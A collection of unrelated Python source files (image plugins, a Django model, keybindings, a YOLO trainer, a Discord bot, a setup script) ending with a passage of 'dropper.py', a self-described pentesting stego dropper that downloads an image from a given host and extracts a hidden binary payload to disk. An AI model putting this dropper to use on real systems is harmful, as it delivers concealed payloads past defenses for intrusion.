combobox.add_callback('activated', lambda w, idx: self.set_type(idx))
combobox.set_tooltip("Set the format of the snap image")
b.snap.set_tooltip(
"Click to grab a snapshot of this channel viewer image")
b.snap.add_callback('activated', self.snap_cb)
b.clear.set_tooltip("Clear the snap image")
b.clear.add_callback('activated', self.clear_cb)
b.center.set_tooltip("Center the snap image")
b.center.add_callback('activated', self.center_cb)
b.fit.set_tooltip("Fit snap image to window")
b.fit.add_callback('activated', self.fit_cb)
b.full.set_tooltip("View at 100% (1:1)")
b.full.add_callback('activated', self.full_cb)
vbox1.add_widget(w, stretch=0)
fr = Widgets.Frame("Screenshot")
fr.set_widget(vbox1)
vpaned = Widgets.Splitter(orientation='vertical')
vpaned.add_widget(fr)
vpaned.add_widget(Widgets.Label(''))
vbox2 = Widgets.VBox()
fr = Widgets.Frame("Save File")
captions = (('Folder:', 'label', 'folder', 'entry'),
('Name:', 'label', 'name', 'entry'),
('Save', 'button'),
)
w, b = Widgets.build_info(captions, orientation='vertical')
self.w.update(b)
b.folder.set_text(self.save_path)
b.folder.set_tooltip("Set the folder path for the snap image")
b.name.set_text(self.save_name)
b.name.set_tooltip("Set the name for the snap image")
b.save.set_tooltip("Click to save the last snap")
b.save.add_callback('activated', self.save_cb)
fr.set_widget(w)
vbox2.add_widget(fr, stretch=0)
# stretch
spacer = Widgets.Label('')
vbox2.add_widget(spacer, stretch=1)
btns = Widgets.HBox()
btns.set_spacing(3)
btn = Widgets.Button("Close")
btn.add_callback('activated', lambda w: self.close())
btns.add_widget(btn, stretch=0)
btn = Widgets.Button("Help")
btn.add_callback('activated', lambda w: self.help())
btns.add_widget(btn, stretch=0)
btns.add_widget(Widgets.Label(''), stretch=1)
vbox2.add_widget(btns, stretch=0)
#vpaned.add_widget(vbox2)
vbox.add_widget(vpaned, stretch=1)
container.add_widget(vbox, stretch=1)
container.add_widget(vbox2, stretch=0)
def set_type(self, idx):
self.tosave_type = self.savetypes[idx]
return True
def close(self):
self.fv.stop_local_plugin(self.chname, str(self))
return True
def start(self):
pass
def stop(self):
self.saved_type = None
def snap_cb(self, w):
format = self.tosave_type
# snap image
self.fv.error_wrap(self.fitsimage.save_rgb_image_as_file,
self.tmpname, format=format)
self.saved_type = format
img = RGBImage(logger=self.logger)
img.load_file(self.tmpname)
self.scrnimage.set_image(img)
def save_cb(self, w):
format = self.saved_type
if format is None:
return self.fv.show_error("Please save an image first.")
# create filename
filename = self.w.name.get_text().strip()
if len(filename) == 0:
return self.fv.show_error("Please set a name for saving the file")
self.save_name = filename
if not filename.lower().endswith('.' + format):
filename = filename + '.' + format
# join to path
path = self.w.folder.get_text().strip()
if path == '':
path = filename
else:
self.save_path = path
path = os.path.join(path, filename)
# copy last saved file
self.fv.error_wrap(shutil.copyfile, self.tmpname, path)
def center_cb(self, w):
self.scrnimage.center_image(no_reset=True)
def fit_cb(self, w):
self.scrnimage.zoom_fit(no_reset=True)
def full_cb(self, w):
self.scrnimage.scale_to(1.0, 1.0, no_reset=True)
def clear_cb(self, w):
self.scrnimage.clear()
def __str__(self):
return 'screenshot'
# END
| StarcoderdataPython |
8085251 | import random
def chunk(list, n):
"""Breaks a list into chunks of size n."""
return [list[i:i + n] for i in range(0, len(list), n)]
def balance_groups(groups):
"""Balances a list of lists, so they are roughly equally sized."""
numPlayers = sum([len(group) for group in groups])
minGroupSize = int(numPlayers / len(groups))
groupsArr = list(enumerate(groups))
for i, group in groupsArr:
while len(group) < minGroupSize:
for j, groupSteal in groupsArr:
if (i != j) and len(groupSteal) > minGroupSize:
group.append(groupSteal.pop())
return [group for group in groups]
def make_groups(players, groupSize):
"""Makes even-ish groups of size groupSize and return an array of the players."""
random.shuffle(players)
if len(players) == 1:
return []
groups = chunk(players, groupSize)
if len(groups) == 1:
return groups
return balance_groups(groups)
| StarcoderdataPython |
8069498 | <reponame>mlbullett/mybigfatrussianwedding<filename>contactus/models.py
""" contactus/models.py """
from django.db import models
from django.utils.timezone import now
class Contact(models.Model):
""" model for contacts """
name = models.CharField(max_length=200)
from_email = models.EmailField(max_length=100)
message = models.TextField()
contact_date = models.DateTimeField(default=now)
def __str__(self):
return self.name
| StarcoderdataPython |
5197572 | <reponame>kosciak/ecs-rogal
import collections
import enum
import string
ASCII_CHARS = set()
for chars in [
string.digits,
string.ascii_lowercase,
string.ascii_uppercase,
string.punctuation,
]:
ASCII_CHARS.update(*chars)
class Modifier(enum.IntFlag):
NONE = 0
SHIFT = 1
CTRL = 2
ALT = 4
GUI = 8
@classmethod
def get(cls, name):
return cls.__members__.get(name.upper())
# Max Unicode codepoint: 0x10ffff
# TODO: Maybe set keycodes of function keys to values above max unicode codepoint?
# This way we can easily map all single character keys, no matter what layout is used
class Keycode(enum.IntEnum):
UNKNOWN = 0
BACKSPACE = ord('\b')
TAB = ord('\t')
RETURN = ord('\n')
ENTER = RETURN
ESCAPE = 27
ESC = ESCAPE
SPACE = ord(' ')
# NOTE: For all printable ASCII characters use ord(char)
EXCLAM = ord('!')
QUOTEDBL = ord('"')
HASH = ord('#')
PERCENT = ord('%')
DOLLAR = ord('$')
AMPERSAND = ord('&')
QUOTE = ord('\'')
LEFTPAREN = ord('(')
RIGHTPAREN = ord(')')
ASTERISK = ord('*')
PLUS = ord('+')
COMMA = ord(',')
MINUS = ord('-')
PERIOD = ord('.')
SLASH = ord('/')
# 0 = 48
# ...
# 9 = 57
COLON = ord(':')
SEMICOLON = ord(';')
LESS = ord('<')
EQUALS = ord('=')
GREATER = ord('>')
QUESTION = ord('?')
AT = ord('@')
# A = 41
# ...
# Z = 90
LEFTBRACKET = ord('[')
BACKSLASH = ord('\\')
RIGHTBRACKET = ord(']')
CARET = ord('^')
UNDERSCORE = ord('_')
BACKQUOTE = ord('`')
# a = 97
# ...
# z = 122
LEFTBRACE = ord('{')
PIPE = ord('|')
RIGHTBRACE = ord('}')
TILDE = ord('~')
# As returned by xev
F1 = 0xffbe
F2 = 0xffbf
F3 = 0xffc0
F4 = 0xffc1
F5 = 0xffc2
F6 = 0xffc3
F7 = 0xffc4
F8 = 0xffc5
F9 = 0xffc6
F10 = 0xffc7
F11 = 0xffc8
F12 = 0xffc9
# As returned by xev
LEFT = 0xff51
UP = 0xff52
RIGHT = 0xff53
DOWN = 0xff54
INSERT = 0xff63
DELETE = 127
HOME = 0xff50
END = 0xff57
PAGE_UP = 0xff55
PAGE_DOWN = 0xff56
# For KP_* use 0xff00 + matching keycode from normal keyboard
KP_0 = 0xff30
KP_1 = 0xff31
KP_2 = 0xff32
KP_3 = 0xff33
KP_4 = 0xff34
KP_5 = 0xff35
KP_6 = 0xff36
KP_7 = 0xff37
KP_8 = 0xff38
KP_9 = 0xff39
KP_DIVIDE = 0xff2f
KP_MULTIPLY = 0xff2a
KP_MINUS = 0xff2d
KP_PLUS = 0xff2b
KP_ENTER = 0xff0a
KP_PERIOD = 0xff2e
KP_COMMA = 0xff2c
KP_CLEAR = 0xff20 # Keypad Clear key (on Mac?)
# As returned by xev
SHIFT_LEFT = 0xffe1
SHIFT_RIGHT = 0xffe2
CTRL_LEFT = 0xffe3
CTRL_RIGHT = 0xffe4
ALT_LEFT = 0xffe9
ALT_RIGHT = 0xfe03 # ISO_Level3_Shift
GUI_LEFT = 0xffeb
GUI_RIGHT = 0xffec # Arbitrary value as I don't have right GUI
MENU = 0xff67
@classmethod
def get(cls, name):
return cls.__members__.get(name.upper())
KEYPAD_KEYCODES = {
Keycode.KP_0,
Keycode.KP_1,
Keycode.KP_2,
Keycode.KP_3,
Keycode.KP_4,
Keycode.KP_5,
Keycode.KP_6,
Keycode.KP_7,
Keycode.KP_8,
Keycode.KP_9,
Keycode.KP_DIVIDE,
Keycode.KP_MULTIPLY,
Keycode.KP_MINUS,
Keycode.KP_PLUS,
Keycode.KP_ENTER,
Keycode.KP_PERIOD,
Keycode.KP_COMMA,
Keycode.KP_CLEAR,
}
MODIFIERS_KEYCODES = {
Keycode.SHIFT_LEFT,
Keycode.CTRL_LEFT,
Keycode.ALT_LEFT,
Keycode.GUI_LEFT,
Keycode.SHIFT_RIGHT,
Keycode.CTRL_RIGHT,
Keycode.ALT_RIGHT,
Keycode.GUI_RIGHT,
}
class Key(collections.namedtuple(
'Key', [
'keycode',
'modifiers',
])):
__slots__ = ()
def __new__(cls, keycode, modifiers=None, ctrl=False, alt=False, shift=False, gui=False):
modifiers = modifiers or Modifier.NONE
if ctrl:
modifiers |= Modifier.CTRL
if alt:
modifiers |= Modifier.ALT
if shift:
modifiers |= Modifier.SHIFT
if gui:
modifiers |= Modifier.GUI
return super().__new__(cls, keycode, modifiers)
@property
def is_keypad(self):
return self.keycode in KEYPAD_KEYCODES
@property
def is_modifier(self):
return self.keycode in MODIFIERS_KEYCODES
def replace(self, keycode):
if keycode in ASCII_CHARS:
keycode = ord(keycode)
if isinstance(keycode, int) and 32 < keycode < 127:
modifiers = self.modifiers
if modifiers & Modifier.SHIFT:
modifiers = self.modifiers ^ Modifier.SHIFT
return Key(keycode, modifiers=modifiers)
return self
@staticmethod
def parse(key):
if isinstance(key, Key):
return key
modifiers = Modifier.NONE
key = key.split('-')
keycode = key[-1]
if keycode.startswith('^'):
keycode = keycode.strip('^')
modifiers |= Modifier.CTRL
if keycode in ASCII_CHARS:
keycode = ord(keycode)
else:
keycode = Keycode.get(keycode) or Keycode.UNKNOWN
for mod in key[0:-1]:
modifier = Modifier.get(mod)
if modifier:
modifiers |= modifier
return Key(keycode, modifiers=modifiers)
def __str__(self):
if 32 < self.keycode < 127:
key = chr(self.keycode)
elif isinstance(self.keycode, Keycode):
key = self.keycode.name
else:
key = str(self.keycode)
if (self.modifiers == Modifier.CTRL) and 32 < self.keycode < 127:
key = f'^{key}'
else:
if self.modifiers & Modifier.SHIFT:
key = f'Shift-{key}'
if self.modifiers & Modifier.ALT:
key = f'Alt-{key}'
if self.modifiers & Modifier.CTRL:
key = f'Ctrl-{key}'
if self.modifiers & Modifier.GUI:
key = f'Super-{key}'
return key
class Bindings(collections.defaultdict):
def __init__(self):
super().__init__(set)
def __getattr__(self, name):
return self[name]
@staticmethod
def parse(data):
bindings = Bindings()
for name, keys in data.items():
bindings[name].update(map(Key.parse, keys))
return bindings
class KeyBindings:
def __init__(self, loader):
self.loader = loader
self._bindings = None
@property
def bindings(self):
if self._bindings is None:
data = self.loader.load()
self._bindings = self.parse_bindings(data)
return self._bindings
def parse_bindings(self, data):
bindings = collections.defaultdict(Bindings)
for category, bindings_data in data.items():
bindings[category] = Bindings.parse(bindings_data)
return bindings
def get(self, key_binding):
if not isinstance(key_binding, str):
return key_binding
category, sep, name = key_binding.partition('.')
bindings = self.bindings[category]
return bindings[name]
def __getattr__(self, name):
return self.bindings[name]
| StarcoderdataPython |
11330868 | <gh_stars>0
import json
import os
from abc import abstractmethod
from datetime import datetime
import keras
import keras.backend as K
from keras.callbacks import ModelCheckpoint, TensorBoard
from keras.layers import Input, Lambda
from keras.models import Model
from keras.optimizers import Adam
from callbacks.common import RedirectModel
from callbacks.eval import Evaluate
from callbacks.learning_scheduler import LearningRateScheduler, lr_step_decay
from loader.loader import Generator
from model.vlt_model import yolo_body, yolo_loss
class Executor(object):
def __init__(self, config, GPUS=1, debug=False):
# settings
self.config = config
self.debug = debug
self.GPUS = GPUS
self.input_shape = (self.config.input_size, self.config.input_size, 3) # multiple of 32, hw
self.word_len = self.config.word_len
self.embed_dim = self.config.embed_dim
self.seg_out_stride = self.config.seg_out_stride
self.start_epoch = self.config.start_epoch
self.n_freeze = 185 + 12
# data init
self.dataset = {}
self.dataset_len = {}
self.load_data()
# create model
self.yolo_model, self.yolo_body, self.yolo_body_single = self.create_model()
# call_back_init
self.callbacks = self.build_callbacks()
def create_model(self):
print('Creating model...')
K.clear_session() # get a new session
image_input = Input(shape=(self.input_shape))
q_input = Input(shape=[self.word_len, self.embed_dim], name='q_input')
h, w, _ = self.input_shape
seg_gt = Input(shape=(h//self.seg_out_stride, w//self.seg_out_stride, 1))
# mask_size = self.config.input_size // self.config.seg_out_stride
model_body = yolo_body(image_input, q_input, self.config)
print('Loading model...')
self.load_model(model_body)
if self.GPUS > 1:
print("Using {} GPUs".format(self.GPUS))
model_body_para = keras.utils.multi_gpu_model(model_body, gpus=self.GPUS)
else:
print("Using SINGLE GPU Only")
model_body_para = model_body
model_loss = Lambda(yolo_loss,
output_shape=(1,),
name='yolo_loss',
arguments={'batch_size': self.config.batch_size})(
[model_body_para.output, seg_gt])
model = Model([model_body_para.input[0],
model_body_para.input[1],
seg_gt], model_loss)
print('Model created.')
return model, model_body_para, model_body
def load_dataset(self, split):
with open(self.config[split], 'rb') as f:
data_lines = json.load(f)
if self.debug:
data_lines = data_lines[:50]
set_num = len(data_lines)
print('Dataset Loaded: %s, Len: %d' % (split, set_num))
return data_lines, set_num
@abstractmethod
def build_callbacks():
pass
@abstractmethod
def load_model():
pass
@abstractmethod
def load_data():
pass
class Trainer(Executor):
def __init__(self, config, log_path, verbose=False, **kwargs):
self.load_path = config.pretrained_weights
self.log_path = log_path
self.verbose = verbose
self.model_path = os.path.join(self.log_path, 'models')
if not os.path.exists(self.model_path):
os.makedirs(self.model_path)
json.dump(config, open(os.path.join(self.model_path, 'config.json'), 'w'))
timestr = datetime.now().strftime('%m_%d_%H_%M_%S')
self.tb_path = os.path.join(self.log_path, timestr)
if not os.path.exists(self.tb_path):
os.makedirs(self.tb_path)
json.dump(config, open(os.path.join(self.tb_path, 'config.json'), 'w'))
super(Trainer, self).__init__(config, **kwargs)
def load_model(self, model_body):
path = self.config.pretrained_weights
model_body.load_weights(path, by_name=True, skip_mismatch=True)
print('Loading weights from {}.'.format(path))
if self.config.free_body in [1, 2]:
# Freeze darknet53 body or freeze all but 3 output layers.
num = (self.n_freeze, len(model_body.layers) - 3)[self.config.free_body - 1]
for i in range(num):
model_body.layers[i].trainable = False
print('Freeze the first {} layers of total {} layers.'.format(num, len(model_body.layers)))
def load_data(self):
self.dataset['val'], self.dataset_len['val'] = self.load_dataset('evaluate_set')
self.dataset['train'], self.dataset_len['train'] = self.load_dataset('train_set')
self.train_generator = Generator(self.dataset['train'], self.config)
# self.train_generator.__getitem__(1)
def build_callbacks(self):
call_backs = []
logging = TensorBoard(log_dir=self.tb_path)
call_backs.append(logging)
model_evaluate = Evaluate(self.dataset['val'], self.config, tensorboard=logging)
call_backs.append(RedirectModel(model_evaluate, self.yolo_body))
checkpoint_map = ModelCheckpoint(self.log_path + '/models/best_map.h5',
verbose=1,
save_best_only=True,
save_weights_only=True,
monitor="seg_iou",
mode='max')
call_backs.append(RedirectModel(checkpoint_map, self.yolo_body_single))
lr_schedue = LearningRateScheduler(lr_step_decay(self.config.lr, self.config.steps),
logging, verbose=1,
init_epoch=self.config.start_epoch)
call_backs.append(lr_schedue)
return call_backs
def train(self):
# Yolo Compile
print('Compiling model... ')
self.yolo_model.compile(loss={'yolo_loss': lambda y_true, y_pred: y_pred},
optimizer=Adam(lr=self.config.lr))
if self.config.workers > 0:
use_multiprocessing = True
else:
use_multiprocessing = False
print('Starting training:')
self.yolo_model.fit_generator(self.train_generator,
callbacks=self.callbacks,
epochs=self.config.epoches,
initial_epoch=self.config.start_epoch,
verbose=True,
workers=self.config.workers,
use_multiprocessing=use_multiprocessing,
max_queue_size=self.config.max_queue_size
)
class Tester(Executor):
def __init__(self, config, **kwargs):
super(Tester, self).__init__(config, **kwargs)
def build_callbacks(self):
self.evaluator = RedirectModel(Evaluate(self.dataset['val'], self.config, phase='test'), self.yolo_body)
self.evaluator.on_train_begin()
def load_data(self):
self.dataset['val'], self.dataset_len['val'] = self.load_dataset('evaluate_set')
def load_model(self, model_body):
model_body.load_weights(self.config.evaluate_model, by_name=False, skip_mismatch=False)
print('Load weights {}.'.format(self.config.evaluate_model))
def eval(self):
results = dict()
self.evaluator.on_epoch_end(-1, results)
seg_iou = results['seg_iou']
seg_prec = results['seg_prec']
# dump results to text file
if not os.path.exists('result/'):
os.mkdir('result/')
from datetime import datetime
timestr = datetime.now().strftime('%m_%d_%H_%M_%S')
with open('result/result_%s.txt' % (timestr), 'w') as f_w:
f_w.write('segmentation result:' + '\n')
f_w.write('seg_iou: %.4f\n' % (seg_iou))
for item in seg_prec:
f_w.write('prec@%.2f: %.4f' % (item, seg_prec[item])+'\n')
f_w.write('\n')
class ImageSentenceTester(Executor):
def __init__(self, config, **kwargs):
super(ImageSentenceTester, self).__init__(config, **kwargs)
def build_callbacks(self):
# build evaluator with dummy data set to testing
self.evaluator = RedirectModel(Evaluate([-1]*1000, self.config, phase='test'), self.yolo_body)
self.evaluator.on_train_begin()
def load_data(self):
pass
def load_model(self, model_body):
model_body.load_weights(self.config.evaluate_model, by_name=False, skip_mismatch=False)
print('Load weights {}.'.format(self.config.evaluate_model))
def eval(self, image_paths, image_sentences):
self.evaluator.evaluate_on_image_sentence(image_paths, image_sentences)
class Debugger(Executor):
def __init__(self, config, **kwargs):
self.config = config
self.debug = True
self.dataset, self.dataset_len = self.load_dataset('train_set')
self.train_generator = Generator(self.dataset, self.config)
self.train_generator.__getitem__(1)
kwargs.update({'GPUS': 1, 'debug': True})
super(Debugger, self).__init__(config, **kwargs)
def build_callbacks(self):
return None
def load_data(self):
return None
def load_model(self, model_body):
return None
def run(self):
self.yolo_model.summary()
self.yolo_model.compile(loss={'yolo_loss': lambda y_true, y_pred: y_pred},
optimizer=Adam(lr=self.config.lr))
| StarcoderdataPython |
3206714 | from dolfin import *
import numpy as np
import matplotlib.pyplot as plt
import tqdm
from scipy.sparse import lil_matrix, coo_matrix
mesh = UnitSquareMesh(20,20, "crossed")
V = FunctionSpace(mesh, "P", 1)
def density_alogrithm(V, u, R=0.2):
r = V.tabulate_dof_coordinates()
A = lil_matrix((len(r), len(r)))
for dof0, x0 in enumerate(tqdm.tqdm(r)):
for dof1, x1 in enumerate(r):
dist = np.linalg.norm(x0 - x1)
if dist < R:
A[dof0, dof1] = R - dist
f = Function(V)
f.vector()[:] = A * u.vector()[:]
return f
def density_helmholtz(V, u, R=0.2):
df, f_ = TestFunction(V), TrialFunction(V)
f = Function(V)
af = dot(grad(df), R**2 * grad(f_)) * dx + df * f_ * dx
Lf = df * u * dx
solve(af==Lf, f)
return f
u = Function(V)
u.vector()[100] = 1.
f = density_helmholtz(V,u)
print(f.vector()[:])
plot(f)
plt.show()
| StarcoderdataPython |
3360605 | from pathlib import Path
from setuptools import find_packages, setup
PACKAGE_ROOT = Path(__file__).parent
VERSION = PACKAGE_ROOT / "version.txt"
def read_requirements(name: str):
p = PACKAGE_ROOT.joinpath(name)
reqs = []
for line in p.read_text().splitlines():
if not line or line.startswith("#"):
continue
req = line
req = req.split("# ")[0].strip()
if req.startswith("file:"):
relative = Path(req[len("file:"):])
virtual = Path("localhost", PACKAGE_ROOT.relative_to("/"), relative)
req = f"{relative.name} @ file://{virtual}"
reqs.append(req)
return reqs
setup(
name="patray",
version=VERSION.read_text().strip(),
packages=find_packages(),
url="https://github.com/pohmelie/patray",
author="pohmelie",
author_email="<EMAIL>",
long_description=Path("readme.md").read_text(),
long_description_content_type="text/markdown",
license="MIT",
license_file="license.txt",
package_data={
"": ["*.txt", "*.template"],
},
install_requires=read_requirements("requirements/production.txt"),
extras_require={
"dev": read_requirements("requirements/dev.txt"),
},
)
| StarcoderdataPython |
1737328 | import asyncio
import discord
import json
import os
import logging
import DBSkr
import hcskr
from discord.ext import commands
from pymongo import MongoClient
my_client = MongoClient("mongodb://localhost:27017/")
mydb = my_client['jindan']
mycol = mydb['userinfo']
loop = asyncio.get_event_loop()
def get_bot_settings() -> dict:
with open('bot_settings.json', 'r', encoding="UTF-8") as f:
return json.load(f)
logger = logging.getLogger('discord')
logging.basicConfig(level=logging.INFO) # DEBUG/INFO/WARNING/ERROR/CRITICAL
handler = logging.FileHandler(filename=f'{get_bot_settings()["bot_name"]}.log', encoding='utf-8', mode='w')
handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))
logger.addHandler(handler)
token = "stable_token"
if get_bot_settings()["debug"]:
"""
만약에 봇 설정 파일에 debug 항목이 true로 되있다면 stable_token이 아닌 canary_token이 불러와집니다.
이를 원하지 않는다면 debug를 false로 해주세요.
"""
token = "canary_token"
print("Bot running in debug mode.")
async def get_prefix(bot, message):
return commands.when_mentioned_or(*[get_bot_settings()["default_prefix"]])(bot, message)
intents = discord.Intents().all()
bot = commands.AutoShardedBot(command_prefix=get_prefix, intents=intents, help_command=None)
Bot = DBSkr.client(bot, koreanbots=get_bot_settings()["koreanbots"], autopost=True)
async def is_whitelisted(ctx):
"""
Cog 명령어 화이트 리스트만 사용가능
"""
return ctx.author.id in get_bot_settings()["whitelist"]
async def change_presence():
"""
봇의 상태메시지 변경
바뀌는 시간 sleep_time
"""
while True:
try:
await bot.change_presence(
activity=discord.Game("!명령어 : 도움말"),
status=discord.Status.online,
afk=False
)
await asyncio.sleep(10)
await bot.change_presence(
activity=discord.Game("%d개의 서버에서 활동중!" % len(bot.guilds)),
status=discord.Status.online,
afk=False
)
await asyncio.sleep(10)
await bot.change_presence(
activity=discord.Game("%d명의 유저들이 사용" % len(bot.users)),
status=discord.Status.online,
afk=False
)
await asyncio.sleep(10)
except Exception:
pass
@commands.check(is_whitelisted)
@bot.command(name="자가진단실행", usage=f"start")
@commands.dm_only()
async def autojinstart(ctx):
list = mycol.find()
for token in list:
result = await hcskr.asyncTokenSelfCheck(token["token"])
user_id = token["user_id"]
embed = discord.embeds.Embed(title=f"금일 자가진단 완료", description=f"<@{user_id}> 님의 금일 자가진단을 수행하였습니다!",
author=ctx.author)
member = discord.utils.get(bot.get_all_members(), id=user_id)
await ctx.send(member, embed=embed)
@bot.event
async def on_ready():
"""
봇이 실행될 작동
"""
logger.info("Bot online.")
@bot.event
async def on_guild_join(guild):
await bot.get_channel(int(819606568508850205)).send(f'새로운 서버에 추가됨 (현재 **{len(bot.guilds)}**개의 서버)')
@bot.command(name="패치노트", aliases=["patchnote"])
@commands.check(is_whitelisted)
async def patnote(ctx, *, arg):
await bot.get_channel(int(819605008688480287)).send(arg)
@bot.command(name="cog", aliases=["cogs", "코그"])
@commands.check(is_whitelisted)
async def _cog_panel(ctx):
"""
Cog를 로드하거나 언로드
"""
load = "⏺"
unload = "⏏"
reload = "🔄"
up = "⬆"
down = "⬇"
stop = "⏹"
emoji_list = [load, unload, reload, up, down, stop]
msg = await ctx.send("잠시만 기다려주세요...")
for x in emoji_list:
await msg.add_reaction(x)
cog_list = [c.replace(".py", "") for c in os.listdir("./cogs") if c.endswith(".py")]
cogs_dict = {}
base_embed = discord.Embed(title=f"{get_bot_settings()['bot_name']} Cog 관리 패널",
description=f"`cogs` 폴더의 Cog 개수: {len(cog_list)}개",
color=discord.Color.from_rgb(225, 225, 225))
for x in cog_list:
if x in [x.lower() for x in bot.cogs.keys()]:
cogs_dict[x] = True
else:
cogs_dict[x] = False
cogs_keys = [x for x in cogs_dict.keys()]
selected = cogs_keys[0]
selected_num = 0
def check(reaction, user):
return user == ctx.author and str(reaction) in emoji_list and reaction.message.id == msg.id
while True:
tgt_embed = base_embed.copy()
for k, v in cogs_dict.items():
if k == selected:
k = "▶" + k
tgt_embed.add_field(name=k, value=f"상태: {'로드됨' if v else '언로드됨'}", inline=False)
await msg.edit(content=None, embed=tgt_embed)
try:
reaction = (await bot.wait_for("reaction_add", check=check, timeout=60))[0]
except asyncio.TimeoutError:
try:
await msg.clear_reactions()
except discord.Forbidden:
[await msg.remove_reaction(x) for x in emoji_list]
await msg.edit(content="Cog 관리 패널이 닫혔습니다.", embed=None)
break
if str(reaction) == down:
if selected_num + 1 == len(cogs_keys):
wd = await ctx.send("이미 마지막 Cog 입니다.")
await wd.delete(delay=3)
else:
selected_num += 1
selected = cogs_keys[selected_num]
elif str(reaction) == up:
if selected_num == 0:
wd = await ctx.send("이미 첫번째 Cog 입니다.")
await wd.delete(delay=3)
else:
selected_num -= 1
selected = cogs_keys[selected_num]
elif str(reaction) == reload:
if not cogs_dict[selected]:
wd = await ctx.send("먼저 Cog를 로드해주세요.")
await wd.delete(delay=3)
else:
bot.reload_extension("cogs." + selected)
elif str(reaction) == unload:
if not cogs_dict[selected]:
wd = await ctx.send("이미 Cog가 언로드되있습니다.")
await wd.delete(delay=3)
else:
bot.unload_extension("cogs." + selected)
cogs_dict[selected] = False
elif str(reaction) == load:
if cogs_dict[selected]:
wd = await ctx.send("이미 Cog가 로드되있습니다.")
await wd.delete(delay=3)
else:
bot.load_extension("cogs." + selected)
cogs_dict[selected] = True
elif str(reaction) == stop:
await msg.clear_reactions()
await msg.edit(content="Cog 관리 패널이 닫혔습니다.", embed=None)
break
try:
await msg.remove_reaction(reaction, ctx.author)
except discord.Forbidden:
pass
# Cog를 불러오는 스크립트
[bot.load_extension(f"cogs.{x.replace('.py', '')}") for x in os.listdir("./cogs") if x.endswith('.py')]
# 봇 상태 메시지를 변경하는 코드 준비
loop.create_task(change_presence())
# 봇 실행
bot.run(get_bot_settings()[token])
| StarcoderdataPython |
3501107 | <filename>dropper.py
#!/usr/bin/python
# Stego Dropper For Pentesters v0.1
# Heavily uses parts from https://github.com/RobinDavid/LSB-Steganography
import urllib
import urllib2
import httplib
import subprocess
import sys
import os
import string
import cv2.cv as cv
import logging
from optparse import OptionParser
# TURN THIS ON IF YOU WANT PROXY SUPPORT
PROXY_SUPPORT = "OFF"
# THIS WILL BE THE PROXY URL
PROXY_URL = "http://proxyinfo:80"
# USERNAME FOR THE PROXY
USERNAME = "username"
# PASSWORD FOR THE PROXY
PASSWORD = "password"
class SteganographyException(Exception):
pass
class LSBSteg():
def __init__(self, im):
self.image = im
self.width = im.width
self.height = im.height
self.size = self.width * self.height
self.nbchannels = im.channels
self.maskONEValues = [1,2,4,8,16,32,64,128]
#Mask used to put one ex:1->00000001, 2->00000010 .. associated with OR bitwise
self.maskONE = self.maskONEValues.pop(0) #Will be used to do bitwise operations
self.maskZEROValues = [254,253,251,247,239,223,191,127]
#Mak used to put zero ex:254->11111110, 253->11111101 .. associated with AND bitwise
self.maskZERO = self.maskZEROValues.pop(0)
self.curwidth = 0 #Current width position
self.curheight = 0 #Current height position
self.curchan = 0 #Current channel position
def saveImage(self,filename):
# Save the image using the given filename
cv.SaveImage(filename, self.image)
def putBinaryValue(self, bits): #Put the bits in the image
for c in bits:
val = list(self.image[self.curwidth,self.curheight]) #Get the pixel value as a list
if int(c) == 1:
val[self.curchan] = int(val[self.curchan]) | self.maskONE #OR with maskONE
else:
val[self.curchan] = int(val[self.curchan]) & self.maskZERO #AND with maskZERO
self.image[self.curwidth,self.curheight] = tuple(val)
self.nextSpace() #Move "cursor" to the next space
def nextSpace(self):#Move to the next slot were information can be taken or put
if self.curchan == self.nbchannels-1: #Next Space is the following channel
self.curchan = 0
if self.curwidth == self.width-1: #Or the first channel of the next pixel of the same line
self.curwidth = 0
if self.curheight == self.height-1:#Or the first channel of the first pixel of the next line
self.curheight = 0
if self.maskONE == 128: #Mask 1000000, so the last mask
raise SteganographyException, "Image filled"
else: #Or instead of using the first bit start using the second and so on..
self.maskONE = self.maskONEValues.pop(0)
self.maskZERO = self.maskZEROValues.pop(0)
else:
self.curheight +=1
else:
self.curwidth +=1
else:
self.curchan +=1
def readBit(self): #Read a single bit int the image
val = self.image[self.curwidth,self.curheight][self.curchan]
val = int(val) & self.maskONE
self.nextSpace()
if val > 0:
return "1"
else:
return "0"
def readByte(self):
return self.readBits(8)
def readBits(self, nb): #Read the given number of bits
bits = ""
for i in range(nb):
bits += self.readBit()
return bits
def byteValue(self, val):
return self.binValue(val, 8)
def binValue(self, val, bitsize): #Return the binary value of an int as a byte
binval = bin(val)[2:]
if len(binval) > bitsize:
raise SteganographyException, "binary value larger than the expected size"
while len(binval) < bitsize:
binval = "0"+binval
return binval
def unhideBin(self):
l = int(self.readBits(64),2)
output = ""
for i in range(l):
output += chr(int(self.readByte(),2))
return output
def drop(host, port, image, payload):
# here is where we set all of our proxy settings
if PROXY_SUPPORT == "ON":
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(realm='RESTRICTED ACCESS',
uri=PROXY_URL, # PROXY SPECIFIED ABOVE
user=USERNAME, # USERNAME SPECIFIED ABOVE
passwd=PASSWORD) # PASSWORD SPECIFIED ABOVE
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
#Grab our file file from the web server and save it to a file
req = urllib2.Request('http://%s:%s/%s' % (host,port,image))
message = urllib2.urlopen(req)
localFile = open('temp.png', 'w')
localFile.write(message.read())
localFile.close()
#Destego binary
inp = cv.LoadImage('temp.png')
steg = LSBSteg(inp)
bin = steg.unhideBin()
f = open(payload,"wb") #Write the binary back to a file
f.write(bin)
f.close()
os.system('rm temp.png')
def main():
# Setup the command line arguments.
optp = OptionParser()
# Output verbosity options
optp.add_option('-q', '--quiet', help='set logging to ERROR',
action='store_const', dest='loglevel',
const=logging.ERROR, default=logging.INFO)
optp.add_option('-d', '--debug', help='set logging to DEBUG',
action='store_const', dest='loglevel',
const=logging.DEBUG, default=logging.INFO)
optp.add_option('-v', '--verbose', help='set logging to COMM',
action='store_const', dest='loglevel',
const=5, default=logging.INFO)
# Image and payload options
optp.add_option("-s", "--host", dest="host",
help="The server to connect to")
optp.add_option("-p", "--port", dest="port",
help="The port listening on the server")
optp.add_option("-i", "--image", dest="image",
help="Name of the image to download")
optp.add_option("-o", "--out", dest="payload",
help="Name of the payload to output")
opts, args = optp.parse_args()
# Setup logging
logging.basicConfig(level=opts.loglevel,
format='%(levelname)-8s %(message)s')
if opts.host is None:
opts.host = raw_input("Host: ")
if opts.port is None:
opts.port = raw_input("Port: ")
if opts.image is None:
opts.image = raw_input("Image path: ")
